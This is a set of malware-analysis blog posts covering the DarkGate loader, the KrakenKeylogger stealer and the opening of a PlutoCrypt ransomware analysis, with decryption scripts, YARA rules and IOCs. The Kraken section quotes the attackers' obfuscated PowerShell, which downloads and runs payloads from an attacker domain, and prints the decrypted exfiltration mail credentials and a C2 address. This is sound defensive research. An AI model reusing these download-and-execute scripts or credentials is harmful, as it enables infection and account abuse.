0x1john Labs

DarkGate - Threat Breakdown Journey

2023-08-06T00:00:00+00:00

Intro

Over the past month, a widespread phishing campaign has targeted individuals globally.

The campaigns execution chain ends with the deployment of a malware known as: DarkGate. A loader type malware.

DarkGate is exclusively sold on underground online forums and the developer keeps a very tight amount of seats for customers.

The Lure

The adversary behind the campaign distributed a high volume campaign of phishing emails, those mails were stolen conversation threads that the adversary had access to.

The challenge here lies in the fact that users often trust what they remember, and because of that, I think users who aren’t aware of such tactics could easily become infected and fall prey to the “social engineering” trap.

Below, you’ll find an example of the content the adversary added to the hijacked conversation thread:

I’ve created a diagram that demonstrates the execution flow of the campaign:

Geofence Check

Honestly, I’m still trying to figure out what checks need to be passed to get through the geofence set by the adversary. After examining some of the URLs on URLscan.io, I discovered that those which were successful in obtaining a payload featured the refresh header in their response (makes sense). This header included the URL needed to download the payload, for instance:

If the user successfully passes the check, an MSI file is downloaded from the URL, following the structure: Project_[0-9]{7}\.msi

MSI Loader

The downloaded MSI carries two embedded files:

CustomAction.dll
WrappedSetupProgram.cab

The DLL is called upon by the MSI to unpack the content housed in WrappedSetupProgram.cab and execute it.

The cab archive includes two files:

Autoit3.exe
UGtZgHHT.au3 (AutoIT 3 script)

AutoIT Script

Extracting The Script

Upon initial examination, the script appears to be altered. Typically, most AutoIT scripts I’ve come across begin with the magic bytes A3 48 4B BE and 41 55 33 21 45 41 (AU3!EA) like explained in this blog:

You can find the au3 script magic bytes AU!EA06(06 here is the subtype of the script), inside of its hex dump as shown in the picture below.

However, the script I analyzed contained a substantial amount of what seemed to be junk data at the start of the file. (We’ll get back to this later in the blog)

I managed to locate the magic bytes indicating the AU3 script’s starting point at the offset 0xA0A5C:

To extract the actual script, I changed the file’s extension from au3 to a3x (representing an AutoIT3 compiled script) and used the tool myAut2Exe for extraction.

Shellcode CallWindowProc Injection

The AU3 script consists of two main components:

A segmented hex-encoded shellcode that is concatenated into a single variable.
Injection and execution of the shellcode.

The first part is quite self-explanatory. In my analysis, the variable was named $SSUGZNUOOE, and it appeared over 2,000 times in the script:

The second segment of the script initiates by verifying the existence of the ProgramFiles folder and confirming that the username executing the script is not SYSTEM. I suspect these checks are evasion tactics to ensure the script runs within a standard Windows environment rather than a sandbox or custom setup.

The script proceeds to convert the hex-encoded shellcode to a binary string using the BinaryToString function and assigns it to the $MZRSVIMCSW variable. The variable $MFCKUCOYGW is initialized as a DLL structure sized to the shellcode using the DllStructCreate function.

The script checks if the path C:\Program Files (x86)\Sophos exists. If it doesn’t, a hex-encoded command is executed which, upon decoding, reveals the use of the API VirtualProtect to modify the memory region protection of $MZRSVIMCSW to ERX. (My theory is that the DarkGate developer noticed Sophos could detect changes in protection type)

The script then copies the content of the shellcode into the DLL structure and injects it by calling the API CallWindowProc. (I found a youtube video that presents a POC for the injection)

ShellCode Analysis

Upon loading the ShellCode in IDA, it becomes immediately apparent that the shellcode consists of a single large function that loads stack-strings.

In addition, I used FLOSS to check on the strings and FLOSS successfully extracted 71 strings:

Next, I will use BlobRunner to invoke the shellcode, set a breakpoint after all the stack-strings have been pushed onto the stack, and dump the memory containing the executable that was pushed:

Loader Analysis

The loader we’ve dumped will be in charge of decoding and executing part of the junk data stored inside of the AutoIT script (After decoding we will face with the final binary which is the DarkGate loader)

The loader requires a a command line argument which will be the path to the AutoIT script. The loader will check for the argument and if it’s not ends with .au3 or the executable can’t get a handle for the file a message box with the text “bin 404” will appear and the loader will terminate itself.

When the loader successfully accesses the AutoIT script, it reads its content and segments it based on the character: | (0x7C).

Next, the loader retrieves 8 bytes from the second offset of the data located in the second element of the array. (Represented as: stringsArray[2][1:9] == xorKeyData).

The character a is then prefixed to these extracted bytes. (Resulting in: a + xorKeyData == modifiedXorKey).

To generate the decryption key, the loader first determines the length of the concatenated byte array, then employs an XOR loop over each byte in the array (len(modifiedXorKey) ^ modifiedXorKey[0] ^ modifiedXorKey[1] ...).

The loader fetches the data from the third element of the array and decodes it from base64. Each byte of this data is XOR-ed with the decryption key and also applied with a NOT operation.

The outcome of this process is an executable, which is the final payload (DarkGate malware)

To streamline this process, I’ve created a Python script capable of extracting and decrypting the DarkGate payload from the AutoIT script:

from base64 import b64decode

AUTO_IT_PATH = '' #Change to the AutoIT script path.
FINAL_PAYLOAD_PATH = '' #Change to output path.

fileData = open(AUTO_IT_PATH, 'rb').read().decode(errors='ignore')

stringsArray = fileData.split('|')
modifiedXorKey = 'a' + stringsArray[1][1:9]

decodedData = b64decode(stringsArray[2])
key = len(modifiedXorKey)

for byte in modifiedXorKey:
    key ^= ord(byte)

finalPayload = b''

for byte in decodedData:
    finalPayload += bytes([~(byte ^ key)& 0xFF])

open(FINAL_PAYLOAD_PATH, 'wb').write(finalPayload)
print('[+] Final Payload Was Created!')

DarkGate Analysis

Essentially, you can read through the developer’s sale thread on xss.is and understand the various capabilities of the loader, which include:

HVNC
Crypto miner setup
Browser history and cookie theft
RDP
HAnyDesk

During my analysis, my primary objective was to decrypt the contained strings, locate the C2 strings (since they’re not available in plain text), and decrypt the network traffic.

Strings Decryption

During my investigation, I found two embedded strings (each 64 characters long) which are invoked by two different but similar functions:

When checking the cross-references for the first string (used in the function on the left), we can see a total of 864 calls to the function.

The first argument passed to the function is the container for the return value, and the second argument is the “encrypted” string.

These hard-coded strings are part of a custom Base64 decoding routine. I’d like to extend my personal thanks to @rivitna2 for correcting me when initially published the strings decoding script.

It isn't encryption, it's Base64 encoding with a non-standard table :-)
— rivitna (@rivitna2) August 1, 2023

The first batch of decoded strings represents all the strings utilized by DarkGate during its execution. Some of these strings looks like notification messages sent to the C2, such as:

- New Bot: DarkGate is inside hAnyDesk user with admin rights
- DarkGate not found to get executed on the new hAnyDesk Desktop, Did you enabled Startup option on builder?
- Credentials detected, removing them!

You can find a list of all decoded strings here

The second hard-coded string is employed in the same routine, but it’s called much less frequently. The developer tried to mess up a bit with researchers from discovering DarkGate’s configurations by adding this second hard-coded string. It is used for decoding DarkGate’s configurations and it also plays a role in decoding the network traffic data.

By decoding the data associated with the second hard-coded string, I managed to uncover DarkGate’s configuration:

http://80.66.88.145|
0=7891
1=Yes
2=Yes
3=No
5=Yes
4=50
6=No
8=Yes
7=4096
9=No
10=bbbGcB
11=No
12=No
13=Yes
14=4
15=bIWRRCGvGiXOga
16=4
17=No
18=Yes
19=Yes

Below is an IDAPython script that requires both the wrapper function calls and the hard-coded strings:

import idc
import idautils
import idaapi
import re

DECRYPTION_FUNCTION_1 = # Replace with "Wrapper" function call
LIST_1 = # Add 64 length list 
STRINGS_FILE_1 = # Output file path

DECRYPTION_FUNCTION_2 = # Replace with "Wrapper" function call
LIST_2 = # Add 64 length list 
STRINGS_FILE_2 = # Output file path

def decShiftFunc(arg1, arg2, arg3, arg4):
    final = ''
    tmp = (arg1 & 0x3F) * 4
    final += chr(((arg2 & 0x30) >> 4) + tmp)
    tmp = (arg2 & 0xF) * 16
    final += chr(((arg3 & 0x3C) >> 2) + tmp)
    final += chr((arg4 & 0x3F) + ((arg3 & 0x03) << 6))
    return final.replace('\0','')

def decWrapperFunc(encData, listNum):
    hexList = []
    for x in encData:
        hexList.append(listNum.index(x))

    subLists = [hexList[i:i+4] for i in range(0, len(hexList), 4)]
    if len(subLists[-1]) < 4:
        subLists[-1].extend([0x00] * (4 - len(subLists[-1])))

    finalString = ''
    for subList in subLists:
        finalString += decShiftFunc(subList[0],subList[1],subList[2],subList[3])
    return finalString

def getArg(ref_addr):
    ref_addr = idc.prev_head(ref_addr)
    if idc.print_insn_mnem(ref_addr) == 'mov':
        if idc.get_operand_type(ref_addr, 1) == idc.o_imm:
            return(idc.get_operand_value(ref_addr, 1))
        else:
            return None

def listDecrypt(functionEA, listID, fileID):
    stringsList = []
    for xref in idautils.XrefsTo(functionEA):
        argPtr = getArg(xref.frm)
        if not argPtr:
            continue
        data = idc.get_bytes(argPtr, 300)
        encData = re.sub(b'[^\x20-\x7F]+', '', data.split(b'\x00')[0]).decode() # Cleaning...
        decData = decWrapperFunc(encData,listID)
        stringsList.append(decData)
        idc.set_cmt(idc.prev_head(xref.frm), decData, 1)
    
    print(f'[+] {len(stringsList)} Strings were extracted')
    out = open(fileID, 'w')
    for string in stringsList:
        out.write(f'{string}\n')
    out.close()

print('[*] Staring decryption of list 1')
listDecrypt(DECRYPTION_FUNCTION_1,LIST_1,STRINGS_FILE_1)
print('[+] Staring decryption of list 2')
listDecrypt(DECRYPTION_FUNCTION_2,LIST_2,STRINGS_FILE_2) 

Network Traffic Decryption

As I hinted in the previous section, DarkGate’s network activity indeed incorporates both data obfuscation techniques we’ve encountered during the analysis:

Loop XOR
Custom Base64 Decoding

Now, let’s examine one of the network streams that is transmitted to the C2:

In the POST request, we can observe several fields:

id
data
act

The id is our XOR key initializer, which generates the actual XOR key using the same technique we used to initialize the XOR key for decrypting the final DarkGate payload. (len(id) ^ id[0] ^ id[1] ..)

The data field is encoded using the second hard-coded string. After decoding, this string will undergo an XOR operation with the key generated from id, as well as a NOT operation.

To simplify this process, I’ve created a Python script that decrypts the data:

LIST = '' # Replace list used for config decoding
DATA = '' # Replace with the encrypted data from the network traffic
ID = '' # Replace with the ID from the network traffic

def decShiftFunc(arg1, arg2, arg3, arg4):
    final = ''
    tmp = (arg1 & 0x3F) * 4
    final += chr(((arg2 & 0x30) >> 4) + tmp)
    tmp = (arg2 & 0xF) * 16
    final += chr(((arg3 & 0x3C) >> 2) + tmp)
    final += chr((arg4 & 0x3F) + ((arg3 & 0x03) << 6))
    return final.replace('\0','')

hexList = []
for x in DATA:
    hexList.append(LIST.index(x))

subLists = [hexList[i:i+4] for i in range(0, len(hexList), 4)]
if len(subLists[-1]) < 4:
    subLists[-1].extend([0x00] * (4 - len(subLists[-1])))

finalString = ''
for subList in subLists:
    finalString += decShiftFunc(subList[0],subList[1],subList[2],subList[3])

key = len(ID)

for x in ID:
    key ^= ord(x)

plainData = ''
for x in finalString:
    plainData += chr(~(ord(x) ^ key)& 0xFF) 

print(f'[+] Output: {plainData}')

Below is the output of the script for these parameters:

- LIST = zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=
- DATA = FpOkFahzFpOuNjxuFsfNFsOAMpOuNvkuFQrcHwtMDfmlHahzFpOuNqOuFs7uFsOAJqOuNj5uFs3kFsOAFpOuNqxuFs3WFsOAjjOuNvkuFsSuFsOLNjOuNjkuFs70FsOAMpOuNj3uFs3WFsOANpOuNqSuFsSuFsOxMsOuFq3uFsYzFsO0FsOuNskuFs7sFsOxNsOuNjkuFs70FsOAjpOuNjyuFsf5FsO0FsOuNpOuFs3UFsOAFqOuNvSuFs3UFsOANqOuNjkuFsSuFsO0jsOuFjOuFskLFsOzjpOuNpSuFsxLFsOzNqOuNs5uFskkFsOLNsOuNskuFsk0FsOzNpOuNsxuFsSuFsO0jsOuFjOuFskxFsOxFjOuNjyuFs7uFsOxFsOuNjkuFs3zFsO0FsOuNqkuFs7kFsOAMpOuNvkuFs3xFsO0FsOuN3xuFskkFsOzMpOuFjOuFskxFsOxFjOuNjyuFs7uFsOxFsOuNjkuFs70FsO0FsOuNj3uFs70FsOAjjOuNvxuFsSuFsOxNqOuNq7uFs7xFsO0jpOuNjkuFs7sFsOANpOuNvxuFs7kFsOAMpOuFvkuFs3kFsOAjjOuNvxuFQh0NsOAMsmQB9nzl9h2JcD0lVRl6HDylgok4aS253G04cmeCc0g4W52JWOs13oS6H0krsANFsOAMpOuNjYuFs70FsOAjjOuNqYuFsftFsOANjOuNqxuFsSuFsOzFjOuNjyuFs7kFsOAMpOuNjYuFsSuFsOzNsOuNj5uFs7kFsOxFsOuNvYuFs3UFsOxMpOuFjOuFsxUFsOANsOuNjyuFs7uFsOxNsOuNjkuFs70FsRQMsyWFJRcJZrh89ne4aEk1syu1fR04TO2hs3z13GL89re1syWFsxUrfIP6arQFp3WFsxzNpYLFar64HBG4aEGrsxGNZhursRQNqMWFe
- ID = GEabbfEcbKBadGaccCDCaGKccGGfKHKG

1033|410064006D0069006E00|MSXGLQPS|4100700070006C00690063006100740069006F006E0020005600650072006900660069006500720020007800360034002000450078007400650072006E0061006C0020005000610063006B0061006700650020002D00200055004E00520045004700490053005400450052004500440020002D002000570072006100700070006500640020007500730069006E00670020004D0053004900200057007200610070007000650072002000660072006F006D0020007700770077002E006500780065006D00730069002E0063006F006D00|240681|Intel Core Processor (Broadwell) @ 8 Cores|4D006900630072006F0073006F0066007400200042006100730069006300200044006900730070006C006100790020004100640061007000740065007200|8192 MB|Windows 10 Pro  x64 Build 19041|Yes||1690445353|Uno.own|4.6|0|0|7891

Summary

On this campaign we’ve uncovered a global campaign using hijacked email threads for phishing, which leads to the download of a sophisticated malware known as DarkGate. Users downloading the malware received an MSI file with two embedded files which carried encoded shellcode for execution. DarkGate also used unique decoding for two embedded strings, revealing commands sent to the C2 and the malware’s configuration. Obfuscation techniques like Loop XOR and custom Base64 decoding were observed in DarkGate’s network activity. Python scripts were created to decrypt the payload and data in this comprehensive analysis.

Yara Rule

I created a YARA rule based on the procedure used to decode the strings:

rule Win_DarkGate
{
	meta:
		author = "0xToxin"
		description = "DarkGate Strings Decoding Routine"
		date = "2023-08-01"
	strings:
		$chunk_1 = {
			8B 55 ??
			8A 4D ??
			80 E1 3F
			C1 E1 02
			8A 5D ??
			80 E3 30
			81 E3 FF 00 00 00
			C1 EB 04
			02 CB
			88 4C 10 ??
			FF 45 ??
			80 7D ?? 40
			74 ??
			8B 45 ??
			E8 ?? ?? ?? ??
			8B 55 ??
			8A 4D ??
			80 E1 0F
			C1 E1 04
			8A 5D ??
			80 E3 3C
			81 E3 FF 00 00 00
			C1 EB 02
			02 CB
			88 4C 10 ??
			FF 45 ??
			80 7D ?? 40
			74 ??
			8B 45 ??
			E8 ?? ?? ?? ??
			8B 55 ??
			8A 4D ??
			80 E1 03
			C1 E1 06
			8A 5D ??
			80 E3 3F
			02 CB
			88 4C 10 ??
			FF 45 ??
		}
	
	condition:
		any of them
}

References

Kraken - The Deep Sea Lurker Part 2

2023-05-26T00:00:00+00:00

Intro

In the second part of analyzing the “KrakenKeylogger”, I will be diving into some proactive “threat hunting” steps I’ve done during my research about the Kraken.
If you haven’t already read the first part of analyzing the Kraken, be sure to check it out here
With that saying let’s begin!

What we have?

Let’s start with what we currently have and how can we pivot with it:

C2: thereccorp.com
Payload fetching domain: masherofmasters.cyou
Binary Name: KrakenStub

The hunting will be splitted into 4 part:

thereccorp.com analysis
masherofmasters.cyou analysis
UnpackMe Yara Hunt
OSINT research

thereccorp.com Analysis

We start off with our final C2 domain thereccorp.com, searching the domain in VirusTotal will respond us with a solid 0/87 vendors detection:

going to the relations tab and looking at the Communicating Files files we can see 22 files which all were flagged as malicious:

all files are pretty recent (oldest one dated to 7th of May 23), this in fact helps us to understand that the campaign is pretty new and keeps being distributed.

Some files were already analyzed by various sandboxes and this helped me a lot by downloading the file from those sandboxes reports (most Sandboxes I know allow downloading the examined sample). Let’s have a look at couple samples that were actually flagged falsely

RareCommodityHelper.exe

Sha256: 8a6bebf08f6c223ed9821ee3b80e420060c66770402687f5c98555f9b0cd02a3
VirusTotal
MalwareBazaar

Looking at the Vendor Threat Intelligence tab in the MalwareBazaar report we can see that 3 different family associated with the sample.

I’ve opened the report of JoeSandBox and simply searched for the string kraken and surprisingly look what popped up:

Why would AgentTesla malware will have KrakenStub named file during it’s execution?

I took a look also UnpackMe report.
Looking at the Unpacked binary that was flagged as masslogger we can see the ProductName, FileDescription, OriginalFilename and InternalName share the same suspicious string we’re looking for: KrakenStub

RareCommodityHelper.exe

Sha256: 413ec94d35627af97c57c6482630e6b2bb299eebf164e187ea7df0a0eb80ecc6
VirusTotal
MalwareBazaar

Going with the same approach as before, I took a look at the report of the different vendors under MalwareBazaar page and found again 3 different families:

I once again checked if our suspicious Kraken string can be found either in JoeSandbox or UnpackMe reports and guess what?

Kraken was found in both of them once again.
At this point I felt comfortable with my findings from the C2 IOC.
Let’s move to the second domain we have.

masherofmasters.cyou Analysis

Typically when I encounter a domain I will investigate it in 3 main sources:

VirusTotal
URLscan
URLhaus

those 3 are my go to sources for inital domain information gathering.

VirusTotal

Looking at the domain on VirusTotal can give us a lot of data, such as DNS records, JARM fingerprints, SSL Certs, WhoIS lookup and much more, but the interesting part that I look when doing a proactive hunt is the Relations tab , this tab can tell us which IP’s this domain was assigned to, if it has subdomains and which associated files this domain had connection with:

Based on the given list, we can see that 5 files were .lnk files, which correlated with our execution flow explained in part 1. (from here you can take the files and see the execution flow when they’re detonated and compare to your findings)

URLscan

Unfortunetlly at the time of investigation the domain was already terminated and no previous scans were made on URLscan so I couldn’t find nothing about it here…

URLhaus

When I searched the domain in URLhaus I found about 12 hits:

Some of the files are being flagged as MassLogger others were flagged as SnakeKeylogger and also AgentTesla , I investigated all the files and actually the ones that were marked as AgentTesla were indeed that malware but the samples which were flagged as MassLogger and SnakeKeylogger were actually our beloved Kraken…

UnpackMe Yara Hunt

UnpackMe provides a unique service of proactive lookback on samples analyzed by the platform based on a given Yara rule
The rule I’ve created was simply based on unique strings that I found in the sample:

rule Win_KrakenStealer {
    meta:
        description = "Win_KrakenStealer rules"
    strings:
		$s1 = "KrakenStub" ascii wide
		$s2 = "KrakenStub.exe" ascii wide
		$s3 = "Kraken_Keylogs_" ascii wide
		$s4 = "Kraken_Password_" ascii wide
		$s5 = "Kraken_Screenshot_" ascii wide
		$s6 = "Kraken_Clipboard_" ascii wide
		$s7 = "KrakenClipboardLog.txt" ascii wide
		
    condition:
        uint16(0) == 0x5a4d and 5 of ($s*)
}

And here is the result of the hunt:

In a 12 weeks lookback there were 11 samples that fitted the given Yara Rule, 8 of them were marked as MassLogger, so I took a look at one of them

and by simply looking at the File Version Information we can see that it’s 99% our Kraken , I downloaded the sample and opened it in DnSpy and guess what?

It was our Kraken! so we found about 11 samples that are flagged falsely.
And with that our hunt for samples is done, from here you can pretty much correlate some IOC’s so see whether or not it’s the same threat actor.

OSINT Research

At this part I wanted to try and find the origin of the malware, so I tried two things:

Search engine dorking
Underground forums

Search Engine Dorking

I tried to search the term "KrakenStub" malware both in Google and DuckDuckGo, besides giving me 2 analysis one of JoeSandbox and the second one of Vmray I couldn’t finding anything useful but it always good to try and search using search engines because you can’t really know what you can find…

Underground Forums

there are several underground/hacking forums that you can find on the clean web without the needs going to TOR and pivoting around the darknet.
One of the most known hacking forums out there is HackForums , so I tried my luck and searched through the marketplace forum for “Kraken” keywords, and after quite some time and found this thread :#1 KrakenKeylogger | 3 Senders | E-Mail Client & Browser Recovery | Perfect Features sold by a user named Krakenz:

What a perfect hit!
that particular finding made my day, I knew that this is it, I’ve closed the circle and I can close this case and fully resolved.

Extra Findings

After I’ve published part 1 of analyzing the Kraken, @jw4lsec and me had a small conversation and he shared with me that Windows Defender was flagging the sample I’ve shared during the investigation as a different malware upon each different execution attempt:

Summary

In the 2nd part of analyzing the Kraken I’ve showed you my way of thinking and approach to the process of threat hunting, especially when your guts tells you that something here is not right. I hope that during those 2 parts of analysis you’ve learned new things, feel free to PM me via any social media.

Kraken - The Deep Sea Lurker Part 1

2023-05-20T00:00:00+00:00

Intro

In this first part we will be going through a recent phishing campaign delivering a never seen before “KrakenKeylogger” malware.

The Phish

The mail sent to the victim is a simple malspam mail with archive attachment:

The archive is a .zip archive that contains .lnk file:

LNK Analysis

LEcmd Tool

In order to analyze an .lnk file I use the LeCMD tool. By using the tool we can see that the .lnk will execute PowerShell.exe alongside with an argument:

PowerShell Script

Let’s breakdown the script:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ProgressPreference = 0; 
function nvRClWiAJT($OnUPXhNfGyEh){ 
    $OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')
}; 

function sDjLksFILdkrdR($OnUPXhNfGyEh){ 
    $vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh; 
    for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){ 
        try{
            $zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)
        } 
        catch{
            $zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)
        }
    };
    $zRavFAQNJqOVxb
}; 

$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'; 
$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1]; 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; 
$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing; 
[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi); & $cDkdhkGBtl; 
sleep 3; 
rm $cDkdhkGBtl;

The script will create a new string which will be the URL to the next payload, the script will take the obfuscated URL string and will deobfuscate it in several steps:

The string will be reversed by the function nvRClWiAJT.
a for loop will iterate through the flipped string and will jump every 2 chars.
each iteration 2 chars will be flipped again, and in the last iteration the last char will flipped also but it won’t have any effect.

Here is a quick python script that does this process:

input_string = 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'[::-1]
output_string = ''

for i in range(0, len(input_string), 2):
    try:
        tmp = input_string[i] + input_string[i + 1]
        output_string += tmp[::-1]
    except:
        output_string += input_string[i]

print(output_string)        

https://masherofmasters.cyou/chin/se1.hta

se1.hta

The fetched payload will be yet another powershell script:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted 

function WQgtWbWK($FL, $i){
    [IO.File]::WriteAllBytes($FL, $i)
};

function APcZNMgjQ($FL){
    if($FL.EndsWith((QXUpF @(4995,5049,5057,5057))) -eq $True){
        Start-Process (QXUpF @(5063,5066,5059,5049,5057,5057,5000,4999,4995,5050,5069,5050)) $FL
    }else{
        Start-Process $FL
    }
};

function laiLJMT($eh){
    $LM = New-Object (QXUpF @(5027,5050,5065,4995,5036,5050,5047,5016,5057,5054,5050,5059,5065));
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;
    $i = $LM.DownloadData($eh);
    return $i
};

function QXUpF($P){
    $n=4949;
    $s=$Null;
    foreach($WK in $P){
        $s+=[char]($WK-$n)
    };
    return $s
};

function deaNPih(){
    $AVYABiApT = $env:APPDATA + '\';
    $XdOFJCmMx = laiLJMT (QXUpF @(5053,5065,5065,5061,5064,5007,4996,4996,5058,5046,5064,5053,5050,5063,5060,5051,5058,5046,5064,5065,5050,5063,5064,4995,5048,5070,5060,5066,4996,5048,5053,5054,5059,4996,5064,5050,4998,4995,5050,5069,5050));
    $qNfQDXYlR = $AVYABiApT + 'se1.exe';
    WQgtWbWK $qNfQDXYlR $XdOFJCmMx;
    APcZNMgjQ $qNfQDXYlR;;;;
}

deaNPih;

The script has several obfuscated strings that are being deobfuscated using the function QXUpF by simply going over each number and substracting 4949 from it. here is a quick script that will deobfuscate those strings and print the clear strings:

stringsList = [[4995,5049,5057,5057],[5063,5066,5059,5049,5057,5057,5000,4999,4995,5050,5069,5050],[5027,5050,5065,4995,5036,5050,5047,5016,5057,5054,5050,5059,5065],[5053,5065,5065,5061,5064,5007,4996,4996,5058,5046,5064,5053,5050,5063,5060,5051,5058,5046,5064,5065,5050,5063,5064,4995,5048,5070,5060,5066,4996,5048,5053,5054,5059,4996,5064,5050,4998,4995,5050,5069,5050]]

for string in stringsList:
    tmp = ''
    for char in string:
        tmp += chr(char - 4949)
    print(f'[+] - {tmp}')

[+] - .dll
[+] - rundll32.exe
[+] - Net.WebClient
[+] - https://masherofmasters.cyou/chin/se1.exe

The script will download another file from the same domain previously used for fetching the .hta file in the previous powershell script.

.NET Loader

Stage 1

the fetched executable (se1.exe) is a .NET executable:

the loader will decrypt embedded resource DataBasePracticalJob using the encryption algorithim RC2, the key for the encryption will be the MD5 hash value of the hardcoded string QEssDJZhQnLywDnJGpBEr (The interesting part here is that the hashing applied on the string after encoding it with BigEndianUnicode, 0x00 appends as a suffix to each byte.) Here is a diagram of the decryption process:

you can use this CyberChef Recipe in order to calculate the MD5 hash easily. Then using RC2 decryption in CyberChef we can also fetch the 2nd stage:

Stage 2

The second stage is a .NET DLL which will be invoked by the first stage executable.
The DLL will be invoke on its first public exported method which is syncfusion:

The second strange DLL will have 2 embedded resources that will be decrypted, the first embedded resource SeaCyanPul will be a .DLL that will be in charge of injecting the final payload to RegAsm.exe (won’t be getting into it right now but the 3rd stage will be uploaded to Malware Bazaar)
The second resource UnknownDetails will be our final payload which will be decrypted using a simple AES-ECB encryption routine without IV, the key in this case will be a sha256 of null value:

As I wrote before that, the payload will injected to RegAsm.exe

Kraken Payload

The Kraken payload 32-bit .NET binary, so we can work with DnSpy to go over some of it functionalities.

Kraken Configs

The configs of the Kraken stored in the .cctor of the main class:

Some of the configs are encrypted using DES-EBC encryption routine without IV, the key is MD5 hash of a preconfigured string, in this case: swCpiTiAhkkEpyDZTnAGhOBZpr, here is a quick python script that will decrypt the config strings for us:

import malduck, base64
from Crypto.Cipher import DES
encryptedStringsDict = {
    'PersonalEmail': 'KYlYJirrzmj9NFMzqVxdqqmBPWvogKC9',
    'PersonalEmailPassword': 'lNI13bp6TxER2sT4YYxfjw==',
    'PersonalEmailHost': '6pvSg6TWhxedDZq2k3/l06fwica30Jlg',
    'TheSMTPReciver': 'qUQWGy6wVRm4PKDty97tnE+Z3alydqyP',
    'PersonalEmailPort': 'VqONpyzLqFY=',
    'PersonalHostLink': 'EdrE+GGMX48=',
    'PersonalHostPassword': 'EdrE+GGMX48=',
    'PersonalHostUsername': 'EdrE+GGMX48=',
    'TheTelegramToken': 'EdrE+GGMX48=',
    'PersonalTeleID': 'EdrE+GGMX48='
}

md5hashKey = malduck.md5(b'swCpiTiAhkkEpyDZTnAGhOBZpr')[:8]
for k,v in encryptedStringsDict.items():
    des = DES.new(md5hashKey, DES.MODE_ECB)
    decVal = des.decrypt(base64.b64decode(v))
    print(f'[+] {k} - {decVal.decode()}')

[+] PersonalEmail - onuma.b@thereccorp.com
[+] PersonalEmailPassword - O@1234
[+] PersonalEmailHost - mail.thereccorp.com
[+] TheSMTPReciver - jbs.hannong@gmail.com
[+] PersonalEmailPort - 587
[+] PersonalHostLink 
[+] PersonalHostPassword 
[+] PersonalHostUsername 
[+] TheTelegramToken 
[+] PersonalTeleID 

So now we have the configuration of the Kraken, let’s move to some capabilities overview:

Custom Commands

The Kraken has several functions that can be executed (only if the user of the malware flag them during the compilation process of the stub), such as:

TimeToRun
LoadWeb
Disable_Task
Disable_CommandPrompt
Disable_Regis
ProcessKiller

Nothing really interesting here, probably some persistence methods/VM checks.

Harvesting Capabilities

The kraken follows the usual info stealer path as stealing local Outlook, Foxmail, ThunderBird mails credentials.

It will lookup for credentials in those browsers:

Google Chrome
QQ Browser
Vivaldi Browser
Chromium Browser
Cent Browser
Chedot Browser
360Browser
Brave
Torch
UC Browser
Blisk
Opera
Avast Browser
Edge
Google Chrome Canary
Firefox
CocCoc
Citrio Browser
CoolNovo
Epic Privacy Browser

The Kraken will also look for FileZilla Credentials

Exfiltration

The Kraken allows exfiltration via:

FTP
SMTP
Telegram Bot

FTP

SMTP

Telegram Bot

Post Exfiltration Actions

After the stealing process was done, the Kraken will automatically start a keylogging process + screenshot capturing of the victim’s computer:

IOC’s

Doc signed Subcontract Agreement.zip - 79571f0ad832a31a1121f7c698496de7e4700271ccf0a7ed7fe817688528a953
seedof.lnk - beec3ec08fba224c161464ebcc64727912c6678dd452596440809ce99c8390fd
1st.exe - dddaf7dfb95c12acaae7de2673becf94fb9cfa7c2d83413db1ab52a5d9108b79
2nd.dll - f7c66ce4c357c3a7c44dda121f8bb6a62bb3e0bc6f481619b7b5ad83855d628b
3rd.dll - 43e79df88e86f344180041d4a4c9381cc69a8ddb46315afd5c4c3ad9e6268e17
Kraken.exe - ee76fec4bc7ec334cc6323ad156ea961e27b75eaa7efb4e88212b81e65673000

Summary

In this blog I’ve covered a new .NET based stealer/keylogger malware, the way it was used in a phishing campaign, and a dive into the loader/injection process including overview of the malware capabilities and config extraction.

Part 2

In part 2 I will be explaining my Threat hunting process, why the malware being flagged falsely? and how I managed to find more samples that helped me confirm my findings.

Part 2 is up! check it out right here

PlutoCrypt - A CryptoJoker Ransomware Variant

2023-04-14T00:00:00+00:00

Intro

In This blog I will deep dive into a variant of CryptoJoker Ransomware alongside with analyzing the multi stage execution chain. BRACE YOURSELVES!

The Phish

Our story begins with a spear phishing email, targeting Turkish individuals and organizations. These attacks often begin with an email that appears to be legitimate, but in reality, is designed to manipulate the recipient into divulging sensitive information or downloading malicious software.

Translation:

Greetings, good day, Aysu from Vakifbank IT service, our iot system is constantly receiving unauthorized verification requests from this “XXX@XXX.XXX” email address, so we needed to contact you. We don’t want to start a legal process, can you please check the logs here and confirm whether they belong to you. ?

In this particular instance, the attacker has embedded a link in the content of the email, which purports to be from Aysu at Vakifbank IT service. The email claims that the bank’s IT system has detected unauthorized verification requests from the recipient’s email address and requests confirmation from the victim.

Execution Chain

Below you can see a diagram that ddemonstrate the execution flow from the moment that the mail was opened:

As you can see the execution chain here is first of all very interesting and secondly contains a lot of steps! I will break down each and every step from the initial payload through the whole files download/execute flow and up until we reach the final payload.

Initial Payload

HTA Handle

I will start with the compressed .hta file.
I’ve opened the file in text editor to see whether the code of the HTA is clear or not and found obfuscated JS code:

Deobfuscating it statically will take years, so instead of it I will convert it to html and save only the script content and open it locally in a browser.
Navigating through the code, the most interesting part was by the end of the script (as I was expecting):

oL2J - will be an object with the type of wobj
ficzs - will contain the data stored in str4
oL2J will execute ficzs

